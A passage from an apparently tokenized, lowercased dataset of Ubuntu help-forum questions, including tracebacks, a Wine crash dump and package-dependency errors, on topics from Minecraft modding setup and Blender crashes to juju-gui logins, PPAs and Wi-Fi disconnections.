__init__ self.readcommands ( verify , no_patch=no_patch ) file `` /home/michel/documenten/loaderextenders/runtime/commands.py '' , line 281 , in readcommands output = self.runcmd ( ' % s -- version ' % self.astyle ) .rstrip ( ) .split ( ' ' ) file `` /home/michel/documenten/loaderextenders/runtime/commands.py '' , line 1187 , in runcmd process = subprocess.popen ( forklist , stdout=subprocess.pipe , stderr=subprocess.stdout , bufsize=-1 ) file `` /usr/lib/python2.7/subprocess.py '' , line 679 , in __init__ errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1249 , in _execute_child raise child_exception oserror : [ errno 2 ] no such file or directory decompile exception : 1 after running the scalac command ubuntu told me scala wase n't installed , so i ran : sudo apt-get install scala running install.sh again gave me the following error : == mcp 7.51 ( data : 7.51 , client : 1.5.2 , server : 1.5.2 ) == '' scalac '' does not support jvm-1.6 target , it is out of date . ignoring fatal error traceback ( most recent call last ) : file `` /home/michel/documenten/loaderextenders/runtime/decompile.py '' , line 50 , in decompile commands = commands ( conffile , verify=true , no_patch=no_patch ) file `` /home/michel/documenten/loaderextenders/runtime/commands.py '' , line 202 , in __init__ self.readcommands ( verify , no_patch=no_patch ) file `` /home/michel/documenten/loaderextenders/runtime/commands.py '' , line 281 , in readcommands output = self.runcmd ( ' % s -- version ' % self.astyle ) .rstrip ( ) .split ( ' ' ) file `` /home/michel/documenten/loaderextenders/runtime/commands.py '' , line 1187 , in runcmd process = subprocess.popen ( forklist , stdout=subprocess.pipe , stderr=subprocess.stdout , bufsize=-1 ) file `` /usr/lib/python2.7/subprocess.py '' , line 679 , in __init__ errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1249 , in _execute_child raise child_exception oserror : [ errno 2 ] no such file or directory decompile exception : 1 so now it 's telling me scalac is outdated , does anyone know how i can fix this ? i would really like to start doing some modding for minecraft : ) thanks in advance
381180	sound analyzer for linux	i have a big ( 8 hours ) audio recording . how can i analyze it ? i would probably like to see waves , so i could see when some abnormal noise appears .
381181	ca n't run any blender version with xubuntu 13.10	after upgrading to xubuntu 13.10 , i also got the new blender 2.69 . did n't work . it opens an empty window and then shuts down . i tried the usual method ( download , unzip , click executable ) , tried installing from the software center , tried the terminal commands i found on the net for installing and updating ( the ppa thingy also posted around here ) , even tried downloading the windows version and run it with wine and all failed . i also tried reverting to previous blender versions and it 's not working either . ps - i 'm a linux noob ( trying very hard to transition from old windows ) . ps2 - this is the error message i get from the wine experience : unhandled exception : unimplemented function msvcp90.dll. ? ? 0 ? $ basic_ifstream @ du ? $ char_traits @ d @ std @ @ @ std @ @ qae @ pbdhh @ z called in 32-bit code ( 0x7b83ac5f ) . register dump : cs:0073 ss:007b ds:007b es:007b fs:0033 gs:003b eip:7b83ac5f esp:02eaf63c ebp:02eaf6a0 eflags:00200246 ( - -- i z- -p- ) eax:7b826419 ebx:7b8af000 ecx:00000000 edx:02eaf8d8 esi:02eaf8d8 edi:031cc600 stack dump : 0x02eaf63c : 02eaf6c0 00000008 031cc5d8 80000100 0x02eaf64c : 00000001 00000000 7b83ac5f 00000002 0x02eaf65c : 7e607760 7e60aacc 01200005 03184000 0x02eaf66c : 00000002 01200024 25a2f46d 031cc5e0 0x02eaf67c : 02eaf8d8 7b8af000 02eafa1b 02eaf674 0x02eaf68c : 00000044 02eafe30 012108b0 2542fc8d backtrace : = > 0 0x7b83ac5f in kernel32 ( +0x2ac5f ) ( 0x02eaf6a0 ) 1 0x7e60772b in msvcp90 ( +0x4772a ) ( 0x02eaf6d0 ) 2 0x7e5d16e5 in msvcp90 ( +0x116e4 ) ( 0x02eaf8a8 ) 3 0x10016d7b in opencolorio ( +0x16d7a ) ( 0x02eaf8a8 ) 4 0x00e90712 in blender ( +0xa90711 ) ( 0x02eafdf8 ) 5 0x012015ce in blender ( +0xe015cd ) ( 0x02eafe40 ) 6 0x7b861d48 call_process_entry+0xb ( ) in kernel32 ( 0x02eafe58 ) 7 0x7b861e8d call_process_entry+0x150 ( ) in kernel32 ( 0x02eafea8 ) 8 0x7bc7edfc call_thread_func_wrapper+0xb ( ) in ntdll ( 0x02eafeb8 ) 9 0x7bc7ee4b call_thread_func+0x44 ( ) in ntdll ( 0x02eaff98 ) 10 0x7bc7edda in ntdll ( +0x6edd9 ) ( 0x02eaffb8 ) 11 0x7bc545bf in ntdll ( +0x445be ) ( 0x02eaffe8 ) 12 0xb75c7b5d wine_call_on_stack+0x1c ( ) in libwine.so.1 ( 0x00000000 ) 13 0xb75c7b3b wine_switch_to_stack+0x2a ( ) in libwine.so.1 ( 0xbfca56b8 ) 14 0x7bc54901 ldrinitializethunk+0x341 ( ) in ntdll ( 0xbfca5738 ) 15 0x7b862766 __wine_kernel_init+0x719 ( ) in kernel32 ( 0xbfca65c8 ) 16 0x7bc5507b __wine_process_init+0x156 ( ) in ntdll ( 0xbfca6618 ) 17 0xb75c63ce wine_init+0x140 ( ) in libwine.so.1 ( 0xbfca6658 ) 18 0x7bf011c6 main+0x13d ( ) in < wine-loader > ( 0xbfca6a98 ) 19 0xb73f3905 __libc_start_main+0xf4 ( main=0x7bf01088 , argc=0x2 , ubp_av=0xbfca6b34 , init=0x7bf011f0 , fini=0x7bf01260 , rtld_fini=0xb77145f0 , stack_end=0xbfca6b2c ) [ /build/buildd/eglibc-2.17/csu/libc-start.c:260 ] in libc.so.6 ( 0x00000000 ) 0x7b83ac5f : subl $ 4 , % esp modules : module address debug info name ( 121 modules ) pe 240000- 34c000 deferred wrap_oal pe 350000- 3a4000 deferred swscale-2 pe 3b0000- 3c5000 deferred pthreadvc2 pe 400000- 2ca6000 export blender pe 2eb0000- 2f06000 deferred sdl pe 10000000-100b6000 export opencolorio pe 1e000000-1e292000 deferred python33 pe 65ec0000-6738a000 deferred avcodec-53 pe 68b80000-68bb1000 deferred avutil-51 pe 6ab00000-6ac1b000 deferred avformat-53 pe 6d780000-6d78d000 deferred avdevice-53 pe 70440000-7067f000 deferred libsndfile-1 pe 72880000-7288e000 deferred vcomp90 elf 7a12c000-7b800000 deferred libllvm-3.3.so.1 elf 7b800000-7ba43000 dwarf kernel32 < elf > \-pe 7b810000-7ba43000 \ kernel32 elf 7bc00000-7bce3000 dwarf ntdll < elf > \-pe 7bc10000-7bce3000 \ ntdll elf 7bf00000-7bf04000 dwarf < wine-loader > elf 7cfe7000-7d01b000 deferred libtxc_dxtn.so elf 7d01b000-7d022000 deferred libffi.so.6 elf 7d022000-7d42a000 deferred libgallium.so.0 elf 7d42a000-7d812000 deferred libdricore9.2.1.so.1 elf 7d827000-7d8a7000 deferred r300_dri.so elf 7d8d5000-7d90c000 deferred uxtheme < elf > \-pe 7d8e0000-7d90c000 \ uxtheme elf 7d90c000-7d917000 deferred libxcursor.so.1 elf 7d91c000-7d92a000 deferred libdrm_radeon.so.1 elf 7d982000-7d9ab000 deferred libexpat.so.1 elf 7d9ab000-7d9e5000 deferred libfontconfig.so.1 elf 7d9e5000-7d9f6000 deferred libxi.so.6 elf 7d9f6000-7d9fa000 deferred libxcomposite.so.1 elf 7d9fa000-7da05000 deferred libxrandr.so.2 elf 7da05000-7da10000 deferred libxrender.so.1 elf 7da10000-7da14000 deferred libxinerama.so.1 elf 7da14000-7da38000 deferred imm32 < elf > \-pe 7da20000-7da38000 \ imm32 elf 7da38000-7dae9000 deferred winex11 < elf > \-pe 7da40000-7dae9000 \ winex11 elf 7dae9000-7db03000 deferred libz.so.1 elf 7db03000-7dba2000 deferred libfreetype.so.6 elf 7dbb7000-7dbcb000 deferred psapi < elf > \-pe 7dbc0000-7dbcb000 \ psapi elf 7dbcb000-7dc3b000 deferred dbghelp < elf > \-pe 7dbd0000-7dc3b000 \ dbghelp elf 7dc3b000-7dc68000 deferred msvfw32 < elf > \-pe 7dc40000-7dc68000 \ msvfw32 elf 7dc68000-7dcb3000 deferred avifil32 < elf > \-pe 7dc70000-7dcb3000 \ avifil32 elf 7dcb3000-7dcd8000 deferred iphlpapi < elf > \-pe 7dcc0000-7dcd8000 \ iphlpapi elf 7dcd8000-7dcf4000 deferred wsock32 < elf > \-pe 7dce0000-7dcf4000 \ wsock32 elf 7dcf4000-7dd11000 deferred libgcc_s.so.1 elf 7ddfa000-7de80000 deferred libglu.so.1 elf 7de80000-7de98000 deferred glu32 < elf > \-pe 7de90000-7de98000 \ glu32 elf 7de98000-7de9f000 deferred libxdmcp.so.6 elf 7de9f000-7dea3000 deferred libxau.so.6 elf 7dea3000-7deb0000 deferred libdrm.so.2 elf 7deb0000-7deb6000 deferred libxxf86vm.so.1 elf 7deb6000-7ded7000 deferred libxcb.so.1 elf 7ded7000-7dedd000 deferred libxcb-dri2.so.0 elf 7dedd000-7def5000 deferred libxcb-glx.so.0 elf 7def5000-7e02a000 deferred libx11.so.6 elf 7e02a000-7e030000 deferred libxfixes.so.3 elf 7e030000-7e043000 deferred libxext.so.6 elf 7e043000-7e059000 deferred libglapi.so.0 elf 7e059000-7e073000 deferred libice.so.6 elf 7e073000-7e0cc000 deferred libgl.so.1 elf 7e0cd000-7e0e1000 deferred shfolder < elf > \-pe 7e0d0000-7e0e1000 \ shfolder elf 7e0e1000-7e1ba000 deferred opengl32 < elf > \-pe 7e100000-7e1ba000 \ opengl32 elf 7e1ba000-7e1cf000 deferred avicap32 < elf > \-pe 7e1c0000-7e1cf000 \ avicap32 elf 7e1cf000-7e202000 deferred ws2_32 < elf > \-pe 7e1e0000-7e202000 \ ws2_32 elf 7e202000-7e22f000 deferred msacm32 < elf > \-pe 7e210000-7e22f000 \ msacm32 elf 7e22f000-7e2b8000 deferred rpcrt4 < elf > \-pe 7e240000-7e2b8000 \ rpcrt4 elf 7e2b8000-7e419000 deferred ole32 < elf > \-pe 7e2d0000-7e419000 \ ole32 elf 7e419000-7e4cf000 deferred winmm < elf > \-pe 7e420000-7e4cf000 \ winmm elf 7e4cf000-7e4fe000 deferred msvcr90 < elf > \-pe 7e4e0000-7e4fe000 \ msvcr90 elf 7e4fe000-7e5a0000 deferred msvcrt < elf > \-pe 7e510000-7e5a0000 \ msvcrt elf 7e5a0000-7e696000 dwarf msvcp90 < elf > \-pe 7e5c0000-7e696000 \ msvcp90 elf 7e696000-7e7b5000 deferred comctl32 < elf > \-pe 7e6a0000-7e7b5000 \ comctl32 elf 7e7b5000-7e7d0000 deferred version < elf > \-pe 7e7c0000-7e7d0000 \ version elf 7e7d0000-7e841000 deferred advapi32 < elf > \-pe 7e7e0000-7e841000 \ advapi32 elf 7e841000-7e920000 deferred gdi32 < elf > \-pe 7e850000-7e920000 \ gdi32 elf 7e920000-7ea8f000 deferred user32 < elf > \-pe 7e930000-7ea8f000 \ user32 elf 7ea8f000-7eb05000 deferred shlwapi < elf > \-pe 7eaa0000-7eb05000 \ shlwapi elf 7eb05000-7ed43000 deferred shell32 < elf > \-pe 7eb10000-7ed43000 \ shell32 elf 7ef82000-7ef8f000 deferred libnss_files.so.2 elf 7ef8f000-7ef9b000 deferred libnss_nis.so.2 elf 7ef9b000-7efb4000 deferred libnsl.so.1 elf 7efb4000-7efbd000 deferred libnss_compat.so.2 elf 7efbd000-7f000000 deferred libm.so.6 elf b73d1000-b73d4000 deferred libx11-xcb.so.1 elf b73d5000-b73da000 deferred libdl.so.2 elf b73da000-b758e000 dwarf libc.so.6 elf b758f000-b75aa000 deferred libpthread.so.0 elf b75aa000-b75ae000 deferred libxdamage.so.1 elf b75ae000-b75b4000 deferred libuuid.so.1 elf b75b4000-b75bd000 deferred libsm.so.6 elf b75bf000-b7703000 dwarf libwine.so.1 elf b7705000-b7727000 deferred ld-linux.so.2 elf b7727000-b7728000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 00000008 ( d ) c : \program files\blender\blender.exe 00000024 0 00000023 0 00000009 0 < == 0000000e services.exe 0000001f 0 0000001e 0 00000018 0 00000017 0 00000015 0 00000010 0 0000000f 0 00000012 winedevice.exe 0000001c 0 00000019 0 00000014 0 00000013 0 0000001a plugplay.exe 00000020 0 0000001d 0 0000001b 0 00000021 explorer.exe 00000022 0 system information : wine build : wine-1.4.1 platform : i386 host system : linux host version : 3.11.0-13-generic
381182	how to access to juju-gui	i 've managed to deploy juju-gui in my saucy server via maas+juju . but no matter what i try i can not log in . i did : juju set juju-gui password='qwerty' and i even set the user . but i can not access . # juju show-log shows error on login . first . how can i set the admin-secret is supposed to be used as password . second . if i override the options with the commands above . why ca n't i log in ? thank you . note : this is what it says log : jb4ja:2013-11-23 13:29:48 debug juju.rpc.jsoncodec codec.go:107 < - { `` type '' : '' admin '' , '' request '' : '' login '' , '' params '' : { `` authtag '' : '' user-admin '' , '' password '' : '' qwerty '' } , '' requestid '' :1 } jb4ja:2013-11-23 13:29:48 debug juju.rpc.jsoncodec codec.go:172 - > { `` requestid '' :1 , '' error '' : '' invalid entity name or password '' , '' errorcode '' : '' unauthorized access '' , '' response '' : { } } jb4ja:2013-11-23 13:29:53 debug juju.rpc.jsoncodec codec.go:107 < - { `` type '' : '' admin '' , '' request '' : '' login '' , '' params '' : { `` authtag '' : '' user-admin '' , '' password '' : '' qwerty '' } , '' requestid '' :2 } jb4ja:2013-11-23 13:29:53 debug juju.rpc.jsoncodec codec.go:172 - > { `` requestid '' :2 , '' error '' : '' invalid entity name or password '' , '' errorcode '' : '' unauthorized access '' , '' response '' : { } }
381185	stuck on wubi installer after restart	download the wubi installer and select kubuntu . everything was going well , asked me to restart so i did . after restart , thought it was going to install everything but get the terminal screen with grub > i am a newbie with linux and would like to know what to do next . thanks
381188	why does `` service networking stop '' cause the screen to become blank ?	i installed ubuntu 13.10 and applied all the upgrades . when i run the following command : sudo service networking stop the screen turns blank . this happens both on physical hardware and on virtualbox . why is it happening and how do i resolve the issue ?
381191	login ignores first key pressed after reboot	after booting ubuntu i see the login screen and a field to enter my password . however , the first key i press is ignored . after that everything works fine . e.g . if my passowrd is `` whatever '' i need to type `` wwhatever '' . i 'm using ubuntu 12.04 lts .
381192	is it fine to remove ppa source list while the application is not removed ?	ok , i just installed pinta from launchpad . after the installation finished i decided to remove the ppa source lists . i run the application just fine , pinta fire-up flawlessly . i do this for any other applications that i 'd installed from launchpad . any suggestion ?
381193	software installation	i want to install software on my ubuntu 13.04 machine given below : - lamp server skype from where i download and install these software by using terminal
381196	i think that i installed ubuntu over my windows 8 partitions	i wanted to reinstall ubuntu ( 13.10 ) and i chose to do it over the old 13.10 ubuntu because it had some problems . now i ca n't boot windows or find it in the boot menu . and ubuntu has all partitions of my pc . could i recover windows ? or at least recover the files i had on windows ? boot-repair disk : http : //paste.ubuntu.com/6463867/ gparted screenshot : http : //i.imgur.com/ricxvah.png test disk : did n't work
381197	how do i get my files from my windows machine to my ubuntu web server for development ?	my win8 machine has dreamweaver etc . installed . this devices is mainly used for development . instead of saving the files to a shared , hosted server i wanted to save and test them locally first and then upload them so i have 3 dev-stages for website : development , beta , production . so i bought a small machine and installed lubuntu . it runs great , afaik , and is connected to my network . i can access the device with vnc and ssh and it is perfectly reachable via ip-address in the browser . however , i ca n't figure out how to handle the development part . or simpler : how do i get my file from my windows machine to my linux ( web-server ) while development ? the files should be stored in realtime , e.g . i want to work on the server directly . my possible solution : network-sharing the /var/www folder > not allowed , only for root , does not seem to be nice solution setting up a /www folder in /home and share the folder > how to include this to apache/php ? using ftp > why ( and how ) should i use ftp if the server is attached to my local network ? i googled for hours but i ca n't find anything that does n't sound `` quick and dirty '' ( like changing permissions on /var/www ) . i 've set up : lubuntu apache2 , php5 , mysql installed phpmyadmin so , what is the best solution ? some edits : as i was totally new to the linux world i did not fully understand permission/user/group system . i managed to install vsftpd and the ftp-user is now allowed to write into the apache /var/www folder ( what i think is a really nice solution ) . webdav ( from the comments ) also sounds nice . for now i will go with the ftp solution - it 's super fast and works , but the question is still open , what is the best solution ?
381198	can i dualboot ubuntu 12.04 64 bit along with windows 7 32 bit ?	i want to install ubuntu 12.04 64bit along side with windows 7 32 bit . is it possible ?
381205	rhythmbox plugin conflict	when i enable cover art search plugin and browse cover art plugin a message appears saying conflicting plugins.is there a way to enable all plugins
381208	ubuntu touch installation to my zte device	i have a device named turkcell t40 produced by zte . i wantto use ubuntu touch with my device . but i am not sure working with my device without problem . my device spesifications are dual core qualcomm msm 8225 1.2 ghz processor 1 gb ram 4 gb storage 4 '' 800 x 480 ips screen 5 mp camera , support hdr can i use ubuntu touch with my device ? i am waiting for good news : ) thank you best regards .
381210	upgrade to 13.10 no network	i am having difficulty upgrading from 13.04 to 13.10 . when i upgrade i have no network . i had to reload 13.04 from a disc ( and reformat ) to get running again . i see this behaviour even when running 13.10 off of a disc . my board is a asus a8v with integrated gigabite lan . it uses a 64 bit athlon .
381211	what is the `` loop '' partition in ubuntu ?	i 'm a new user to ubuntu , to just installed and used the command sudo fdisk -l. i found out that my windows partition is sda and my ubuntu is loop . what is this loop thing ?
381212	can not add any ppa	i recently tried to add ppa from this website . i did sudo add-apt-repository ppa : canonical-qt5-edgers/qt5-proper from terminal . i get an error saying can not add ppa : 'ppa : canonical-qt5-edgers/qt5-proper ' . please check that the ppa name or format is correct . as suggested in other similar questions , i do n't have any problem with internet connection because apt-get install is working as expected . this is not even ppa specific problem , i could n't add other ppas as well . this question says that i have to format the entire hard drive to solve this . i definitely can not do that . is this bug still unsolved ? i added the ppa line using software center . when it updates cache , it comes up with an error saying w : gpg error : http : //ppa.launchpad.net saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey f141b5f0c7122f9b , w : failed to fetch cdrom : //ubuntu 13.04 _raring ringtail_ - release i386 ( 20130424 ) /dists/raring/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 13.04 _raring ringtail_ - release i386 ( 20130424 ) /dists/raring/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead . output of sudo add-apt-repository ppa : canonical-qt5-edgers/qt5-proper can not add ppa : 'ppa : canonical-qt5-edgers/qt5-proper ' . please check that the ppa name or format is correct . how to solve this and what is the cause of this problem ? thanks in advance . os : ubuntu 13.10 after edit : before the edit , the question had ppa of ubuntu sdk.after posting this , i realised that ubuntu sdk is in the repositories of ubuntu 13.10 . just thought , may be that 's why i can not add ppa . i tried next ppa and i came up with the same series of errors .
381214	chromium is really slow in xubuntu	i just installed xubuntu 12.04.3 on my toshiba satellite , and i 've noticed that chromium is really slow . i have a 3 bar wifi signal , so it ca n't be that . also , when the computer ran windows , it actually got faster internet . is there a way to get faster internet ?
381216	how to correclty run ampl ? i get `` file or directory non existent '' when running the binary	i 'm trying to install ampl but i encountered some problems . i 'm following these instructions : www.netlib.org/ampl/student/linux/readme i downloaded ampl.gz and cplex.tar ( from www.netlib.org/ampl/student/linux ) ; i created a directory bin in my home folder ; i moved the two files to the folder bin/ampl ; i gave the following commands : gzip -dn ampl.gz cplex.tgz tar xf cplex.tar chmod +x ampl rm cplex.tar i added this string to the end of the file : export path= '' /home/davide/bin/ampl : $ path '' i saved the file and i have logged out . when i try to give the command ampl < file.run the terminal does not recognize the command . where am i wrong ? echo $ path /home/davide/bin/ampl : /home/davide/bin : /opt/texbin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games davide @ davide-x201ep : ~/bin/ampl $ ampl < dieta.run bash : /home/davide/bin/ampl/ampl : file o directory non esistente davide @ davide-x201ep : ~/bin/ampl $ ls -l totale 5064 -rwxrwxr-x 1 davide davide 1017156 giu 25 16:21 ampl -rwxr-xr-x 1 davide davide 4061168 giu 6 22:11 cplex -rw-r -- r -- 1 davide davide 363 ott 18 2012 dieta.dat -rw-r -- r -- 1 davide davide 389 ott 25 10:32 dieta.mod -rw-r -- r -- 1 davide davide 77 nov 22 19:12 dieta.run -rw-r -- r -- 1 davide davide 119 ott 25 10:30 dieta.run~ -rw-r -- r -- 1 davide davide 3153 gen 3 2001 license -rw-r -- r -- 1 davide davide 79082 gen 14 2011 readme davide @ davide-x201ep : ~/bin/ampl $ ./ampl < dieta.run bash : ./ampl : file o directory non esistente davide @ davide-x201ep : ~/bin/ampl $ uname -m x86_64 davide @ davide-x201ep : ~/bin/ampl $ file $ ( which ampl ) /home/davide/bin/ampl/ampl : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.2.5 , stripped davide @ davide-x201ep : ~/bin/ampl $ ldd $ ( which ampl ) non è un eseguibile dinamico i tried to install ia32-libs but : davide @ davide-x201ep : ~ $ sudo apt-get install ia32-libs [ sudo ] password for davide : lettura elenco dei pacchetti ... fatto generazione albero delle dipendenze lettura informazioni sullo stato ... fatto alcuni pacchetti non possono essere installati . questo può voler dire che è stata richiesta una situazione impossibile oppure , se si sta usando una distribuzione in sviluppo , che alcuni pacchetti richiesti non sono ancora stati creati o sono stati rimossi da incoming . le seguenti informazioni possono aiutare a risolvere la situazione : i seguenti pacchetti hanno dipendenze non soddisfatte : ia32-libs : dipende : ia32-libs-multiarch e : impossibile correggere i problemi , ci sono pacchetti danneggiati bloccati . davide @ davide-x201ep : ~ $ sudo apt-get install ia32-libs-multiarch lettura elenco dei pacchetti ... fatto generazione albero delle dipendenze lettura informazioni sullo stato ... fatto alcuni pacchetti non possono essere installati . questo può voler dire che è stata richiesta una situazione impossibile oppure , se si sta usando una distribuzione in sviluppo , che alcuni pacchetti richiesti non sono ancora stati creati o sono stati rimossi da incoming . le seguenti informazioni possono aiutare a risolvere la situazione : i seguenti pacchetti hanno dipendenze non soddisfatte : ia32-libs-multiarch : i386 : dipende : bluez-alsa : i386 ma non sta per essere installato dipende : libgettextpo0 : i386 ma non sta per essere installato dipende : gstreamer0.10-plugins-base : i386 ma non sta per essere installato dipende : gstreamer0.10-plugins-good : i386 ma non sta per essere installato dipende : gstreamer0.10-fluendo-mp3 : i386 ma non sta per essere installato dipende : gtk2-engines : i386 ma non sta per essere installato dipende : gtk2-engines-murrine : i386 ma non sta per essere installato dipende : gtk2-engines-pixbuf : i386 ma non sta per essere installato dipende : gtk2-engines-oxygen : i386 ma non sta per essere installato dipende : gvfs : i386 ma non sta per essere installato dipende : ibus-gtk : i386 ma non sta per essere installato dipende : libacl1 : i386 ma non sta per essere installato dipende : libao4 : i386 ma non sta per essere installato dipende : libasound2 : i386 ma non sta per essere installato dipende : libasound2-plugins : i386 ma non sta per essere installato dipende : libasyncns0 : i386 ma non sta per essere installato dipende : libattr1 : i386 ma non sta per essere installato dipende : libaudio2 : i386 ma non sta per essere installato dipende : libcanberra-gtk-module : i386 ma non sta per essere installato dipende : libcap2 : i386 ma non sta per essere installato dipende : libcapi20-3 : i386 ma non sta per essere installato dipende : libcups2 : i386 ma non sta per essere installato dipende : libcupsimage2 : i386 ma non sta per essere installato dipende : libcurl3 : i386 ma non sta per essere installato dipende : libdbus-glib-1-2 : i386 ma non sta per essere installato dipende : libesd0 : i386 ma non sta per essere installato dipende : libfontconfig1 : i386 ma non sta per essere installato dipende : libfreetype6 : i386 ma non sta per essere installato dipende : libgail-common : i386 ma non sta per essere installato dipende : libgconf-2-4 : i386 ma non sta per essere installato dipende : libgdbm3 : i386 ma non sta per essere installato dipende : libglapi-mesa : i386 ma non sta per essere installato dipende : libglu1-mesa : i386 ma non sta per essere installato dipende : libgphoto2-2 : i386 ma non sta per essere installato dipende : libgphoto2-port0 : i386 ma non sta per essere installato dipende : libgtk2.0-0 : i386 ma non sta per essere installato dipende : libmpg123-0 : i386 ma non sta per essere installato dipende : libncursesw5 : i386 ma non sta per essere installato dipende : libnspr4 : i386 ma non sta per essere installato dipende : libnss3 : i386 ma non sta per essere installato dipende : libodbc1 : i386 ma non sta per essere installato dipende : libopenal1 : i386 ma non sta per essere installato dipende : libpulse-mainloop-glib0 : i386 ma non sta per essere installato dipende : libqt4-dbus : i386 ma non sta per essere installato dipende : libqt4-network : i386 ma non sta per essere installato dipende : libqt4-opengl : i386 ma non sta per essere installato dipende : libqt4-qt3support : i386 ma non sta per essere installato dipende : libqt4-script : i386 ma non sta per essere installato dipende : libqt4-scripttools : i386 ma non sta per essere installato dipende : libqt4-sql : i386 ma non sta per essere installato dipende : libqt4-svg : i386 ma non sta per essere installato dipende : libqt4-test : i386 ma non sta per essere installato dipende : libqt4-xml : i386 ma non sta per essere installato dipende : libqt4-xmlpatterns : i386 ma non sta per essere installato dipende : libqtcore4 : i386 ma non sta per essere installato dipende : libqtgui4 : i386 ma non sta per essere installato dipende : libqtwebkit4 : i386 ma non sta per essere installato dipende : librsvg2-common : i386 ma non sta per essere installato dipende : libsane : i386 ma non sta per essere installato dipende : libsdl-mixer1.2 : i386 ma non sta per essere installato dipende : libsdl-image1.2 : i386 ma non sta per essere installato dipende : libsdl-net1.2 : i386 ma non sta per essere installato dipende : libsdl-ttf2.0-0 : i386 ma non sta per essere installato dipende : libsdl1.2debian : i386 ma non sta per essere installato dipende : libsqlite3-0 : i386 ma non sta per essere installato dipende : libssl0.9.8 : i386 ma non sta per essere installato dipende : libssl1.0.0 : i386 ma non sta per essere installato dipende : libstdc++5 : i386 ma non sta per essere installato dipende : libstdc++6 : i386 ma non sta per essere installato dipende : libxaw7 : i386 ma non sta per essere installato dipende : libxml2 : i386 ma non sta per essere installato dipende : libxp6 : i386 ma non sta per essere installato dipende : libxslt1.1 : i386 ma non sta per essere installato dipende : libxss1 : i386 ma non sta per essere installato dipende : libxtst6 : i386 ma non sta per essere installato dipende : odbcinst1debian2 : i386 ma non sta per essere installato dipende : libpulsedsp : i386 ma non sta per essere installato dipende : xaw3dg : i386 ma non sta per essere installato raccomanda : libgl1-mesa-glx : i386 ma non sta per essere installato raccomanda : libgl1-mesa-dri : i386 ma non sta per essere installato e : impossibile correggere i problemi , ci sono pacchetti danneggiati bloccati .
381218	change user 's name in kde	i want to setup my real name in 'system settings ' - 'account details ' - 'password & user account ' but when i click 'apply ' there is a dialog asking me for my password and i type it correctly but then it says there is an error : 'an error occurred and your name has probably not been changed . the error message was : chfn : permission denied . '
381219	my wifi disconnects after some time and gets blocked by hardware switch	i 'm new to linux and ubuntu and i have been using windows for years , but viruses made me consider linux . i first tried elementary os because it is easy to use , i enjoyed it a lot but after surfing the web for quite some time my wifi disconnects and only reconnect when i reboot . i 've googled similar problems , but none of the solutions worked . after days of frustration i decided to install ubuntu 13.10 in hope the problem is limited to elementary os , but ubuntu 13.10 also has the same problem . i am able to use wifi for an hour or two but it would disconnect and would only reconnect if i reboot , the time before it disconnect is never consistent . sometimes it only last for 30 minutes , some times it last for 4 hours . most of the time it disconnect when there 's no internet activity . rfkill unblock all does not work and i have also reset my bios as suggested in the threads but none of it worked . i even replaced gnome-network-manager with wicd , but it still do n't work . in most thread i read the asker always put the result of lsmod and lspci with his/her question so i will put it as well , though i do not really know what they are for . lsmod module size used by coretemp 13195 0 joydev 17097 0 parport_pc 31981 0 ppdev 17391 0 uvcvideo 71309 0 videobuf2_vmalloc 13048 1 uvcvideo snd_hda_codec_realtek 45592 1 videobuf2_memops 13170 1 videobuf2_vmalloc snd_hda_intel 42658 3 rfcomm 53664 0 videobuf2_core 39125 1 uvcvideo bnep 18893 2 bluetooth 323622 10 bnep , rfcomm arc4 12536 2 videodev 107508 2 uvcvideo , videobuf2_core snd_hda_codec 164003 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13272 1 snd_hda_codec snd_pcm 89488 2 snd_hda_codec , snd_hda_intel **ath9k 135969 0 microcode 18830 0 ath9k_common 13619 1 ath9k ath9k_hw 429197 2 ath9k_common , ath9k snd_page_alloc 14230 2 snd_pcm , snd_hda_intel snd_seq_midi 13132 0** snd_seq_midi_event 14475 1 snd_seq_midi ath 19187 3 ath9k_common , ath9k , ath9k_hw snd_rawmidi 25094 1 snd_seq_midi snd_seq 55383 2 snd_seq_midi_event , snd_seq_midi mac80211 513247 1 ath9k snd_seq_device 14137 3 snd_seq , snd_rawmidi , snd_seq_midi cfg80211 401436 3 ath , ath9k , mac80211 snd_timer 24447 2 snd_pcm , snd_seq psmouse 90642 0 serio_raw 13189 0 i915 589697 3 snd 60790 16 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi lpc_ich 16864 0 drm_kms_helper 46867 1 i915 drm 242354 4 i915 , drm_kms_helper i2c_algo_bit 13197 1 i915 soundcore 12600 1 snd binfmt_misc 13140 1 acer_wmi 31735 0 sparse_keymap 13708 1 acer_wmi wmi 18590 1 acer_wmi mac_hid 13037 0 video 18777 2 i915 , acer_wmi lp 13299 0 parport 40795 3 lp , ppdev , parport_pc atl1c 40949 0 ahci 25579 2 libahci 26554 1 ahci lspci 00:00.0 host bridge : intel corporation atom processor d4xx/d5xx/n4xx/n5xx dmi bridge 00:02.0 vga compatible controller : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller 00:02.1 display controller : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation 